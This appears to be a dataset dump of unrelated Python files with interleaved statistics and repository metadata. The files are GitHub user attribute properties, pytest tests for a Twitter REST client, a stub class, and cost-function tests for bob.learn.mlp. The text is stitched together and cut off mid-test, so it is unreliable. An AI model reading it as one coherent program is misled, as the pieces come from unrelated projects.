    hireable = property(lambda self: self.attributes.get("hireable", False))

    # Numeric fields (default None when absent).
    id = property(lambda self: self.attributes.get("id", None))
    public_repos = property(lambda self: self.attributes.get("public_repos", None))
    public_gists = property(lambda self: self.attributes.get("public_gists", None))
    followers = property(lambda self: self.attributes.get("followers", None))
    following = property(lambda self: self.attributes.get("following", None))
| 23.5
| 73
| 0.632439
| 370
| 3,243
| 5.435135
| 0.189189
| 0.175037
| 0.222775
| 0.3819
| 0.482347
| 0.334659
| 0.035803
| 0
| 0
| 0
| 0
| 0.008048
| 0.233734
| 3,243
| 137
| 74
| 23.671533
| 0.801207
| 0.054271
| 0
| 0.326531
| 1
| 0
| 0.096437
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.326531
| false
| 0
| 0.010204
| 0.326531
| 0.673469
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
93020f1f2ece4a1264853cebd0804e5416a8eec8
| 15,025
|
py
|
Python
|
test_wriggler/test_twitter_rest.py
|
parantapa/wriggler
|
805989c4be6754a0ebf1da9572774dc8efb8f6a7
|
[
"MIT"
] | null | null | null |
test_wriggler/test_twitter_rest.py
|
parantapa/wriggler
|
805989c4be6754a0ebf1da9572774dc8efb8f6a7
|
[
"MIT"
] | null | null | null |
test_wriggler/test_twitter_rest.py
|
parantapa/wriggler
|
805989c4be6754a0ebf1da9572774dc8efb8f6a7
|
[
"MIT"
] | 1
|
2018-03-02T05:34:35.000Z
|
2018-03-02T05:34:35.000Z
|
# pylint: disable=redefined-outer-name
"""
Test the search_tweets api.
"""
import pytest
import wriggler.twitter.auth as auth
import wriggler.twitter.rest as rest
# Fixture (user_id, screen_name) pairs used by the user-centric tests.
TEST_USERS = [
    (145125358, "SrBachchan"),
    (762093631, "sig_chi")
]
# Fixture (list_id, slug, owner_screen_name) triples for the lists endpoints.
TEST_LISTS = [
    (2299490, "news", "mashable"),
    (72905612, "healthcare", "cnnbrk")
]
# Search terms fed to the search/tweets endpoint.
TEST_QUERY = ["news", "ff"]
# Tweet ids known to have been retweeted (for the retweet endpoints).
TEST_RETWEETED_TWEETS = [
    # 718218948060143617, # https://twitter.com/SrBachchan/status/718218948060143617
    # 718204766422048769, # https://twitter.com/SrBachchan/status/718204766422048769
    717026378739290112, # https://twitter.com/POTUS/status/717026378739290112
    714084384010272768, # https://twitter.com/POTUS/status/714084384010272768
]
@pytest.fixture
def samp_auth():
    """
    Return the sample auth object.

    Reads Twitter API credentials from the local file
    ``test_keys-twitter.json`` via ``wriggler.twitter.auth.read_keys``.
    """
    kfname = "test_keys-twitter.json"
    ath = auth.read_keys(kfname)
    return ath
def test_users_show(samp_auth):
    """
    Test the users_show method.

    Fetches each fixture user twice -- by user_id and by screen_name --
    and checks both lookups return the same profile.
    """
    for user_id, screen_name in TEST_USERS:
        params = {"user_id": user_id}
        profile, meta = rest.users_show(samp_auth, **params)
        assert meta["code"] == 200
        assert profile["id"] == user_id
        assert profile["screen_name"] == screen_name
        params = {"screen_name": screen_name}
        profile, meta = rest.users_show(samp_auth, **params)
        assert meta["code"] == 200
        assert profile["id"] == user_id
        assert profile["screen_name"] == screen_name
def test_users_lookup(samp_auth):
    """
    Test the users_lookup method.

    Bulk-fetches the fixture users by id, then by screen name; both
    calls must return exactly the fixture set.
    """
    user_ids = set(u[0] for u in TEST_USERS)
    screen_names = set(u[1] for u in TEST_USERS)
    params = {"user_id": list(user_ids)}
    profiles, meta = rest.users_lookup(samp_auth, **params)
    assert meta["code"] == 200
    assert user_ids == set(p["id"] for p in profiles)
    assert screen_names == set(p["screen_name"] for p in profiles)
    params = {"screen_name": list(screen_names)}
    profiles, meta = rest.users_lookup(samp_auth, **params)
    assert meta["code"] == 200
    assert user_ids == set(p["id"] for p in profiles)
    assert screen_names == set(p["screen_name"] for p in profiles)
def test_statuses_user_timeline(samp_auth):
    """
    Test the statuses/user_timeline method.

    Every returned tweet must belong to the requested user, whether the
    user is addressed by id or by screen name.
    """
    for user_id, screen_name in TEST_USERS:
        params = {"user_id": user_id, "count": 10}
        tweets, meta = rest.statuses_user_timeline(samp_auth, **params)
        assert meta["code"] == 200
        assert all(t["user"]["id"] == user_id for t in tweets)
        assert all(t["user"]["screen_name"] == screen_name for t in tweets)
        params = {"screen_name": screen_name, "count": 10}
        tweets, meta = rest.statuses_user_timeline(samp_auth, **params)
        assert meta["code"] == 200
        assert all(t["user"]["id"] == user_id for t in tweets)
        assert all(t["user"]["screen_name"] == screen_name for t in tweets)
def test_statuses_user_timeline_iter(samp_auth):
    """
    Test the statuses/user_timeline method using id_iter.

    With "maxitems" set the call yields (tweets, meta) pages; at least
    20 distinct tweets must accumulate across pages.
    """
    for user_id, screen_name in TEST_USERS:
        params = {"user_id": user_id, "count": 10, "maxitems": 20}
        results = []
        for tweets, meta in rest.statuses_user_timeline(samp_auth, **params):
            assert meta["code"] == 200
            results.extend(tweets)
        assert all(t["user"]["id"] == user_id for t in results)
        assert all(t["user"]["screen_name"] == screen_name for t in results)
        assert len(results) >= 20
        assert len(set(r["id"] for r in results)) >= 20
def test_search_tweets(samp_auth):
    """
    Test the tweets_search method.

    Only checks the HTTP status; search contents are too volatile to pin.
    """
    for query in TEST_QUERY:
        params = {"q": query, "result_type": "recent"}
        _, meta = rest.search_tweets(samp_auth, **params)
        assert meta["code"] == 200
def test_search_tweets_iter(samp_auth):
    """
    Test the tweets_search method w/ id_iter.

    Paging must produce at least 20 distinct tweets in total.
    """
    for query in TEST_QUERY:
        params = {"q": query, "result_type": "recent", "count": 10,
              "maxitems": 20}
        results = []
        for data, meta in rest.search_tweets(samp_auth, **params):
            assert meta["code"] == 200
            results.extend(data["statuses"])
        assert len(results) >= 20
        assert len(set(r["id"] for r in results)) >= 20
def test_friends_ids(samp_auth):
    """
    Test friends/ids method.

    Fixture users are expected to follow at least 10 accounts.
    """
    for user_id, _ in TEST_USERS:
        params = {"user_id": user_id, "count": 10}
        data, meta = rest.friends_ids(samp_auth, **params)
        assert meta["code"] == 200
        assert len(data["ids"]) >= 10
def test_friends_ids_iter(samp_auth):
    """
    Test friends/ids method w/ cursor_iter.

    Pages must accumulate at least 20 distinct friend ids.
    """
    for user_id, _ in TEST_USERS:
        params = {"user_id": user_id, "count": 10, "maxitems": 20}
        results = []
        for data, meta in rest.friends_ids(samp_auth, **params):
            assert meta["code"] == 200
            assert len(data["ids"]) >= 10
            results.extend(data["ids"])
        assert len(results) >= 20
        assert len(set(results)) >= 20
def test_followers_ids(samp_auth):
    """
    Test followers/ids method.

    Fixture users are expected to have at least 10 followers.
    """
    for user_id, _ in TEST_USERS:
        params = {"user_id": user_id, "count": 10}
        data, meta = rest.followers_ids(samp_auth, **params)
        assert meta["code"] == 200
        assert len(data["ids"]) >= 10
def test_followers_ids_iter(samp_auth):
    """
    Test followers/ids method w/ cursor_iter.

    Pages must accumulate at least 20 distinct follower ids.
    """
    for user_id, _ in TEST_USERS:
        params = {"user_id": user_id, "count": 10, "maxitems": 20}
        results = []
        for data, meta in rest.followers_ids(samp_auth, **params):
            assert meta["code"] == 200
            results.extend(data["ids"])
        assert len(results) >= 20
        assert len(set(results)) >= 20
def test_trends_available(samp_auth):
    """
    Test the trends available api.

    Expects a list of more than 10 locations, each carrying a "woeid".
    """
    data, meta = rest.trends_available(samp_auth)
    assert meta["code"] == 200
    assert isinstance(data, list)
    assert len(data) > 10
    for place in data:
        assert "woeid" in place
def test_trends_place(samp_auth):
    """
    Test the trends api for places.

    Every trend entry must carry a "name".
    """
    params = {"id": 1}  # NOTE(review): presumably a WOEID -- confirm against rest.trends_place
    data, meta = rest.trends_place(samp_auth, **params)
    assert meta["code"] == 200
    for trend in data:
        for obj in trend["trends"]:
            assert "name" in obj
def test_favorites_list(samp_auth):
    """
    Test the favorites/list method.

    Each favorite must look like a tweet (has "id" and "text"), whether
    the user is addressed by id or by screen name.
    """
    for user_id, screen_name in TEST_USERS:
        params = {"user_id": user_id, "count": 10}
        tweets, meta = rest.favorites_list(samp_auth, **params)
        assert meta["code"] == 200
        assert all("id" in t for t in tweets)
        assert all("text" in t for t in tweets)
        params = {"screen_name": screen_name, "count": 10}
        tweets, meta = rest.favorites_list(samp_auth, **params)
        assert meta["code"] == 200
        assert all("id" in t for t in tweets)
        assert all("text" in t for t in tweets)
def test_favorites_list_iter(samp_auth):
    """
    Test the favorites_list method using id_iter.

    Pages must accumulate at least 20 distinct favorites.
    """
    for user_id, _ in TEST_USERS:
        params = {"user_id": user_id, "count": 10, "maxitems": 20}
        results = []
        for tweets, meta in rest.favorites_list(samp_auth, **params):
            assert meta["code"] == 200
            results.extend(tweets)
        assert all("id" in t for t in results)
        assert all("text" in t for t in results)
        assert len(results) >= 20
        assert len(set(r["id"] for r in results)) >= 20
def test_statuses_show(samp_auth):
    """
    Test the statuses/show method.

    Cross-checks statuses/show against the latest timeline tweet.
    """
    for user_id, _ in TEST_USERS:
        # First get the last tweet id for a test user
        params = {"user_id": user_id, "count": 1}
        tweet, meta = rest.statuses_user_timeline(samp_auth, **params)
        assert meta["code"] == 200
        tweet = tweet[0]
        assert tweet["user"]["id"] == user_id
        # Next get the same tweet with statuses show
        nparams = {"id": tweet["id"]}
        ntweet, nmeta = rest.statuses_show(samp_auth, **nparams)
        assert nmeta["code"] == 200
        assert tweet["id"] == ntweet["id"]
        assert tweet["text"] == ntweet["text"]
def test_statuses_lookup(samp_auth):
    """
    Test the statuses/lookup method.

    Cross-checks the bulk lookup against the user timeline.
    """
    for user_id, _ in TEST_USERS:
        # First get the last 10 tweet ids for a test user
        params = {"user_id": user_id, "count": 10}
        tweets, meta = rest.statuses_user_timeline(samp_auth, **params)
        assert meta["code"] == 200
        assert all(t["user"]["id"] == user_id for t in tweets)
        # Create the list of tweet ids
        tids = [t["id"] for t in tweets]
        # Next get the same tweets using statuses lookup
        nparams = {"id": tids}
        ntweets, nmeta = rest.statuses_lookup(samp_auth, **nparams)
        assert nmeta["code"] == 200
        assert set(tids) == set(t["id"] for t in ntweets)
def test_lists_memberships(samp_auth):
    """
    Test the lists/memberships method.

    Each returned list record must carry member and subscriber counts.
    """
    for user_id, screen_name in TEST_USERS:
        params = {"user_id": user_id, "count": 10}
        data, meta = rest.lists_memberships(samp_auth, **params)
        assert meta["code"] == 200
        assert "lists" in data
        assert all("member_count" in l for l in data["lists"])
        assert all("subscriber_count" in l for l in data["lists"])
        params = {"screen_name": screen_name, "count": 10}
        data, meta = rest.lists_memberships(samp_auth, **params)
        assert meta["code"] == 200
        assert "lists" in data
        assert all("member_count" in l for l in data["lists"])
        assert all("subscriber_count" in l for l in data["lists"])
def test_lists_memberships_iter(samp_auth):
    """
    Test the lists/memberships method using cursor_iter.

    Pages must accumulate at least 20 distinct lists for either way of
    addressing the user.
    """
    for user_id, screen_name in TEST_USERS:
        params = {"user_id": user_id, "count": 10, "maxitems": 20}
        results = []
        for data, meta in rest.lists_memberships(samp_auth, **params):
            assert meta["code"] == 200
            assert "lists" in data
            results.extend(data["lists"])
        assert all("member_count" in l for l in results)
        assert all("subscriber_count" in l for l in results)
        assert len(results) >= 20
        assert len(set(r["id"] for r in results)) >= 20
        params = {"screen_name": screen_name, "count": 10, "maxitems": 20}
        results = []
        for data, meta in rest.lists_memberships(samp_auth, **params):
            assert meta["code"] == 200
            assert "lists" in data
            results.extend(data["lists"])
        assert all("member_count" in l for l in results)
        assert all("subscriber_count" in l for l in results)
        assert len(results) >= 20
        assert len(set(r["id"] for r in results)) >= 20
def test_lists_show(samp_auth):
    """
    Test the lists_show method.

    Fetches each fixture list by id, then by slug + owner; both must
    resolve to the same list.
    """
    for list_id, slug, owner_screen_name in TEST_LISTS:
        params = {"list_id": list_id}
        lst, meta = rest.lists_show(samp_auth, **params)
        assert meta["code"] == 200
        assert lst["id"] == list_id
        assert lst["slug"] == slug
        assert lst["user"]["screen_name"] == owner_screen_name
        params = {"slug": slug, "owner_screen_name": owner_screen_name}
        lst, meta = rest.lists_show(samp_auth, **params)
        assert meta["code"] == 200
        assert lst["id"] == list_id
        assert lst["slug"] == slug
        assert lst["user"]["screen_name"] == owner_screen_name
def test_lists_members(samp_auth):
    """
    Test the lists/members method.

    Each member must look like a user record (screen_name, listed_count).
    """
    for list_id, slug, owner_screen_name in TEST_LISTS:
        params = {"list_id": list_id, "count": 10}
        data, meta = rest.lists_members(samp_auth, **params)
        assert meta["code"] == 200
        assert "users" in data
        assert all("screen_name" in u for u in data["users"])
        assert all("listed_count" in u for u in data["users"])
        params = {"slug": slug, "owner_screen_name": owner_screen_name}
        data, meta = rest.lists_members(samp_auth, **params)
        assert meta["code"] == 200
        assert "users" in data
        assert all("screen_name" in u for u in data["users"])
        assert all("listed_count" in u for u in data["users"])
def test_lists_members_iter(samp_auth):
    """
    Test the lists/members method using cursor_iter.

    Pages must accumulate at least 20 distinct members for either way of
    addressing the list.

    Bugfix: the original issued an extra, non-iterated rest.lists_members
    call before each paging loop; its result was discarded immediately,
    wasting a rate-limited API request. The docstring also named the wrong
    endpoint (lists/memberships).
    """
    for list_id, slug, owner_screen_name in TEST_LISTS:
        # Page by list_id.
        params = {"list_id": list_id, "count": 10, "maxitems": 20}
        results = []
        for data, meta in rest.lists_members(samp_auth, **params):
            assert meta["code"] == 200
            assert "users" in data
            results.extend(data["users"])
        assert all("screen_name" in u for u in results)
        assert all("listed_count" in u for u in results)
        assert len(results) >= 20
        assert len(set(r["id"] for r in results)) >= 20
        # Page by slug + owner screen name.
        params = {"slug": slug, "owner_screen_name": owner_screen_name,
                  "count": 10, "maxitems": 20}
        results = []
        for data, meta in rest.lists_members(samp_auth, **params):
            assert meta["code"] == 200
            assert "users" in data
            results.extend(data["users"])
        assert all("screen_name" in u for u in results)
        assert all("listed_count" in u for u in results)
        assert len(results) >= 20
        assert len(set(r["id"] for r in results)) >= 20
def test_statuses_retweeters_ids(samp_auth):
    """
    Test statuses/retweeters/ids method.

    The fixture tweets are known retweets, so at least one id returns.
    """
    for retweeted_tweet_id in TEST_RETWEETED_TWEETS:
        params = {"id": retweeted_tweet_id}
        data, meta = rest.statuses_retweeters_ids(samp_auth, **params)
        assert meta["code"] == 200
        assert len(data["ids"]) >= 1
def test_statuses_retweeters_ids_iter(samp_auth):
    """
    Test statuses/retweeters/ids method w/ cursor_iter.

    NOTE(review): the final assertions only demand >= 1 item despite
    maxitems=200, while each page is asserted to hold >= 10 ids -- the
    intended lower bounds look inconsistent; confirm against cursor_iter.
    """
    for retweeted_tweet_id in TEST_RETWEETED_TWEETS:
        params = {"id": retweeted_tweet_id, "maxitems": 200}
        results = []
        for data, meta in rest.statuses_retweeters_ids(samp_auth, **params):
            assert meta["code"] == 200
            assert len(data["ids"]) >= 10
            results.extend(data["ids"])
        assert len(results) >= 1
        assert len(set(results)) >= 1
def test_statuses_retweets_id(samp_auth):
    """
    Test statuses/retweets/id method.

    Every returned tweet must be a retweet of the requested status.
    """
    for retweeted_tweet_id in TEST_RETWEETED_TWEETS:
        params = {"id": retweeted_tweet_id}
        data, meta = rest.statuses_retweets_id(samp_auth, **params)
        assert meta["code"] == 200
        assert len(data) >= 1
        for tweet in data:
            assert tweet["retweeted_status"]["id"] == retweeted_tweet_id
| 33.764045
| 84
| 0.608652
| 2,027
| 15,025
| 4.324618
| 0.066601
| 0.056582
| 0.054301
| 0.063997
| 0.827744
| 0.76386
| 0.746178
| 0.708647
| 0.687999
| 0.673625
| 0
| 0.035843
| 0.260965
| 15,025
| 444
| 85
| 33.84009
| 0.753602
| 0.096705
| 0
| 0.635417
| 0
| 0
| 0.096904
| 0.001669
| 0
| 0
| 0
| 0
| 0.420139
| 1
| 0.086806
| false
| 0
| 0.010417
| 0
| 0.100694
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
fabff8a63852953a329e4a875fc34a0e8b2bca82
| 127
|
py
|
Python
|
modules/memberlist/_memberlist_updater.py
|
ptsurko/coursera_cloud
|
ed34a409034e2b7a85c6a3d5700c621fcabe8bde
|
[
"MIT"
] | null | null | null |
modules/memberlist/_memberlist_updater.py
|
ptsurko/coursera_cloud
|
ed34a409034e2b7a85c6a3d5700c621fcabe8bde
|
[
"MIT"
] | null | null | null |
modules/memberlist/_memberlist_updater.py
|
ptsurko/coursera_cloud
|
ed34a409034e2b7a85c6a3d5700c621fcabe8bde
|
[
"MIT"
] | null | null | null |
class _MemberlistUpdater(object):
def add_or_updater(self):
pass
def _get_memberlist(self):
pass
| 15.875
| 33
| 0.629921
| 14
| 127
| 5.357143
| 0.785714
| 0.213333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.299213
| 127
| 8
| 34
| 15.875
| 0.842697
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0.4
| 0
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 6
|
fafbab98dabf467268c8f554e8f180b0e764d981
| 24
|
py
|
Python
|
selenium_chrome/models/__init__.py
|
kkristof200/selenium_chrome
|
1bb1f2ac6c0254704607f6f28d80029546043c11
|
[
"MIT"
] | 3
|
2021-07-27T05:22:42.000Z
|
2022-03-21T10:55:32.000Z
|
selenium_chrome/models/__init__.py
|
kkristof200/selenium_chrome
|
1bb1f2ac6c0254704607f6f28d80029546043c11
|
[
"MIT"
] | null | null | null |
selenium_chrome/models/__init__.py
|
kkristof200/selenium_chrome
|
1bb1f2ac6c0254704607f6f28d80029546043c11
|
[
"MIT"
] | 1
|
2021-11-24T07:34:35.000Z
|
2021-11-24T07:34:35.000Z
|
from .prefs import Prefs
| 24
| 24
| 0.833333
| 4
| 24
| 5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 24
| 1
| 24
| 24
| 0.952381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
87eaaa49fd4edf48d2a1048ae772abffc22c089f
| 7,641
|
py
|
Python
|
bob/learn/mlp/test_cost.py
|
bioidiap/bob.learn.mlp
|
c4b1534236c94dc1acf16dcdc6e7d8478cdffd58
|
[
"BSD-3-Clause"
] | null | null | null |
bob/learn/mlp/test_cost.py
|
bioidiap/bob.learn.mlp
|
c4b1534236c94dc1acf16dcdc6e7d8478cdffd58
|
[
"BSD-3-Clause"
] | 6
|
2015-02-26T14:51:51.000Z
|
2017-07-06T11:55:46.000Z
|
bob/learn/mlp/test_cost.py
|
bioidiap/bob.learn.mlp
|
c4b1534236c94dc1acf16dcdc6e7d8478cdffd58
|
[
"BSD-3-Clause"
] | 4
|
2015-06-14T18:24:29.000Z
|
2017-07-05T23:10:34.000Z
|
#!/usr/bin/env python
# vim: set fileencoding=utf-8 :
# Andre Anjos <andre.dos.anjos@gmail.com>
# Fri 7 Jun 08:59:24 2013
"""Test cost functions
"""
import numpy
import math
from . import SquareError, CrossEntropyLoss
from .test_utils import estimate_gradient
from bob.learn.activation import Logistic, Identity
def is_close(x, y, eps=1e-10):
    """Return True when ``x`` and ``y`` differ by strictly less than ``eps``."""
    difference = x - y
    return -eps < difference < eps
def rand_safe0(eps=2e-4):
    """Draw one uniform sample confined to [eps, 1 - eps)."""
    scale = 1 - 2 * eps
    return numpy.random.rand() * scale + eps
def rand_safe(n, eps=2e-4):
    """Draw ``n`` uniform samples, each confined to [eps, 1 - eps)."""
    scale = 1 - 2 * eps
    return numpy.random.rand(n) * scale + eps
def rand_safe2(n, p, eps=2e-4):
    """Draw an (n, p) uniform matrix with entries confined to [eps, 1 - eps)."""
    scale = 1 - 2 * eps
    return numpy.random.rand(n, p) * scale + eps
def rand_safe3(n, p, q, eps=2e-4):
    """Draw an (n, p, q) uniform array with entries confined to [eps, 1 - eps)."""
    scale = 1 - 2 * eps
    return numpy.random.rand(n, p, q) * scale + eps
def rand_safe4(n, p, q, r, eps=2e-4):
    """Draw an (n, p, q, r) uniform array with entries confined to [eps, 1 - eps)."""
    scale = 1 - 2 * eps
    return numpy.random.rand(n, p, q, r) * scale + eps
def test_square_error():
    """SquareError.f must equal 0.5 * (p - q)**2 for scalar inputs."""
    op = SquareError(Identity())
    x = rand_safe(10) #10 random numbers between 0 and 1
    y = rand_safe(10) #10 random numbers between 0 and 1
    # go for an exact match
    for p,q in zip(x,y):
        expected = 0.5*math.pow(p-q,2)
        assert is_close(op.f(p,q), expected), 'SquareError does not perform as expected %g != %g' % (op.f(p,q), expected)
def test_square_error_derivative():
    """SquareError.f_prime must equal (p - q), exactly and numerically.

    Bugfix: the exact-match failure message previously interpolated
    op.f(p, q) instead of the derivative op.f_prime(p, q) that was
    actually compared, producing a misleading diagnostic.
    """
    op = SquareError(Identity())
    x = rand_safe(10) #10 random numbers between 0 and 1
    y = rand_safe(10) #10 random numbers between 0 and 1
    # go for an exact match
    for p,q in zip(x,y):
        expected = p-q
        assert is_close(op.f_prime(p,q), expected), 'SquareError derivative does not perform as expected %g != %g' % (op.f_prime(p,q), expected)
    # go for approximation against a numerical gradient estimate
    for p,q in zip(x,y):
        absdiff = abs(op.f_prime(p,q)-estimate_gradient(op.f,p,args=(q,)))
        assert absdiff < 1e-4, 'SquareError derivative and estimation do not match to 10^-4: |%g-%g| = %g' % (op.f_prime(p,q), estimate_gradient(op.f,p,args=(q,)), absdiff)
def test_square_error_error():
    """SquareError.error with Logistic activation must equal p*(1-p)*(p-q)."""
    act = Logistic()
    op = SquareError(act)
    x = rand_safe(10) #10 random numbers between 0 and 1
    y = rand_safe(10) #10 random numbers between 0 and 1
    # go for an exact match
    for p,q in zip(x,y):
        expected = p*(1-p)*(p-q)
        assert is_close(op.error(p,q), expected), 'SquareError error does not perform as expected %g != %g' % (op.error(p,q), expected)
def test_cross_entropy():
    """CrossEntropyLoss.f must equal -q*log(p) - (1-q)*log(1-p)."""
    op = CrossEntropyLoss(Logistic())
    x = rand_safe(10) #10 random numbers between 0 and 1
    y = rand_safe(10) #10 random numbers between 0 and 1
    # go for an exact match
    for p,q in zip(x,y):
        expected = -q*math.log(p) - (1-q)*math.log(1-p)
        assert is_close(op.f(p,q), expected), 'CrossEntropyLoss does not perform as expected %g != %g' % (op.f(p,q), expected)
def test_cross_entropy_derivative():
    """CrossEntropyLoss.f_prime must equal (p-q)/(p*(1-p)), exactly and numerically.

    Bugfixes in the failure messages only: the exact-match message
    interpolated op.f(p, q) instead of op.f_prime(p, q), and the
    approximation message named "SquareError" and a 10^-4 tolerance even
    though this block tests CrossEntropyLoss against a 1e-3 threshold.
    """
    op = CrossEntropyLoss(Logistic())
    x = rand_safe(10, eps=0.2) #10 random numbers between 0 and 1
    y = rand_safe(10, eps=0.2) #10 random numbers between 0 and 1
    # go for an exact match
    for p,q in zip(x,y):
        expected = (p-q)/(p*(1-p))
        assert is_close(op.f_prime(p,q), expected), 'CrossEntropyLoss derivative does not perform as expected %g != %g' % (op.f_prime(p,q), expected)
    # go for approximation against a numerical gradient estimate
    for p,q in zip(x,y):
        reldiff = abs((op.f_prime(p,q)-estimate_gradient(op.f,p,args=(q,))) / op.f_prime(p,q))
        assert reldiff < 1e-3, 'CrossEntropyLoss derivative and estimation do not match to 10^-3: |%g-%g| = %g' % (op.f_prime(p,q), estimate_gradient(op.f,p,args=(q,)), reldiff)
def test_square_error_equality():
    """Two SquareError instances over Identity activations compare equal."""
    first = SquareError(Identity())
    second = SquareError(Identity())
    assert first == second
def test_cross_entropy_equality():
    """Two CrossEntropyLoss instances over Identity activations compare equal."""
    first = CrossEntropyLoss(Identity())
    second = CrossEntropyLoss(Identity())
    assert first == second
def test_cross_entropy_error_with_logistic():
    """CrossEntropyLoss.error with Logistic activation simplifies to p - q."""
    act = Logistic()
    op = CrossEntropyLoss(act)
    x = rand_safe(10) #10 random numbers between 0 and 1
    y = rand_safe(10) #10 random numbers between 0 and 1
    # go for an exact match
    for p,q in zip(x,y):
        expected = p-q
        assert is_close(op.error(p,q), expected), 'CrossEntropyLoss+Logistic error does not perform as expected %g != %g' % (op.error(p,q), expected)
def test_cross_entropy_error_without_logistic():
    """CrossEntropyLoss.error with Identity activation is (p-q)/(p*(1-p))."""
    act = Identity()
    op = CrossEntropyLoss(act)
    x = rand_safe(10) #10 random numbers between 0 and 1
    y = rand_safe(10) #10 random numbers between 0 and 1
    # go for an exact match
    for p,q in zip(x,y):
        expected = (p-q)/(p*(1-p))
        assert is_close(op.error(p,q), expected), 'CrossEntropyLoss+Identity error does not perform as expected %g != %g' % (op.error(p,q), expected)
def test_cross_entropy_activation_detection():
    """CrossEntropyLoss must detect whether its activation is Logistic (enables the p-q shortcut)."""
    op = CrossEntropyLoss(Logistic())
    assert op.logistic_activation
    op = CrossEntropyLoss(Identity())
    # IDIOM FIX: '== False' replaced with truth testing ('not ...'), the
    # Pythonic way to assert a flag is unset
    assert not op.logistic_activation
def test_1d_ndarray():
    """SquareError must operate elementwise on 1-D arrays, preserving shape and float dtype."""
    C = rand_safe0()  # NOTE(review): return value unused; presumably advances/seeds the RNG — confirm
    op = SquareError(Identity())
    O = rand_safe(10)  # 10 random numbers between 0 and 1
    T = rand_safe(10)  # 10 random numbers between 0 and 1
    Y = op(O, T)
    assert Y.shape == O.shape
    assert Y.dtype == numpy.dtype(float)
    Y_f = op.f(O, T)
    assert Y_f.shape == O.shape
    # BUG FIX: previously asserted Y.dtype instead of Y_f.dtype (copy-paste error)
    assert Y_f.dtype == numpy.dtype(float)
    Y_f_prime = op.f_prime(O, T)
    assert Y_f_prime.shape == O.shape
    # BUG FIX: previously asserted Y.dtype instead of Y_f_prime.dtype
    assert Y_f_prime.dtype == numpy.dtype(float)
    Y_error = op.error(O, T)
    assert Y_error.shape == O.shape
    # BUG FIX: previously asserted Y.dtype instead of Y_error.dtype
    assert Y_error.dtype == numpy.dtype(float)
    # every vectorised element must agree with the scalar implementation
    for k, (o, t) in enumerate(zip(O, T)):
        assert is_close(op(o, t), Y[k])
        assert is_close(op.f(o, t), Y_f[k])
        assert is_close(op.f_prime(o, t), Y_f_prime[k])
        assert is_close(op.error(o, t), Y_error[k])
def test_2d_ndarray():
    """SquareError must operate elementwise on 2-D arrays, preserving shape and float dtype."""
    C = rand_safe0()  # NOTE(review): return value unused; presumably advances/seeds the RNG — confirm
    op = SquareError(Identity())
    O = rand_safe2(3, 3)
    T = rand_safe2(3, 3)
    Y = op(O, T)
    assert Y.shape == O.shape
    assert Y.dtype == numpy.dtype(float)
    Y_f = op.f(O, T)
    assert Y_f.shape == O.shape
    # BUG FIX: previously asserted Y.dtype instead of Y_f.dtype (copy-paste error)
    assert Y_f.dtype == numpy.dtype(float)
    Y_f_prime = op.f_prime(O, T)
    assert Y_f_prime.shape == O.shape
    # BUG FIX: previously asserted Y.dtype instead of Y_f_prime.dtype
    assert Y_f_prime.dtype == numpy.dtype(float)
    Y_error = op.error(O, T)
    assert Y_error.shape == O.shape
    # BUG FIX: previously asserted Y.dtype instead of Y_error.dtype
    assert Y_error.dtype == numpy.dtype(float)
    # compare against the scalar implementation via the flat iterators
    for k, (o, t) in enumerate(zip(O.flat, T.flat)):
        assert is_close(op(o, t), Y.flat[k])
        assert is_close(op.f(o, t), Y_f.flat[k])
        assert is_close(op.f_prime(o, t), Y_f_prime.flat[k])
        assert is_close(op.error(o, t), Y_error.flat[k])
def test_3d_ndarray():
    """SquareError must operate elementwise on 3-D arrays, preserving shape and float dtype."""
    C = rand_safe0()  # NOTE(review): return value unused; presumably advances/seeds the RNG — confirm
    op = SquareError(Identity())
    O = rand_safe3(3, 3, 3)
    T = rand_safe3(3, 3, 3)
    Y = op(O, T)
    assert Y.shape == O.shape
    assert Y.dtype == numpy.dtype(float)
    Y_f = op.f(O, T)
    assert Y_f.shape == O.shape
    # BUG FIX: previously asserted Y.dtype instead of Y_f.dtype (copy-paste error)
    assert Y_f.dtype == numpy.dtype(float)
    Y_f_prime = op.f_prime(O, T)
    assert Y_f_prime.shape == O.shape
    # BUG FIX: previously asserted Y.dtype instead of Y_f_prime.dtype
    assert Y_f_prime.dtype == numpy.dtype(float)
    Y_error = op.error(O, T)
    assert Y_error.shape == O.shape
    # BUG FIX: previously asserted Y.dtype instead of Y_error.dtype
    assert Y_error.dtype == numpy.dtype(float)
    # compare against the scalar implementation via the flat iterators
    for k, (o, t) in enumerate(zip(O.flat, T.flat)):
        assert is_close(op(o, t), Y.flat[k])
        assert is_close(op.f(o, t), Y_f.flat[k])
        assert is_close(op.f_prime(o, t), Y_f_prime.flat[k])
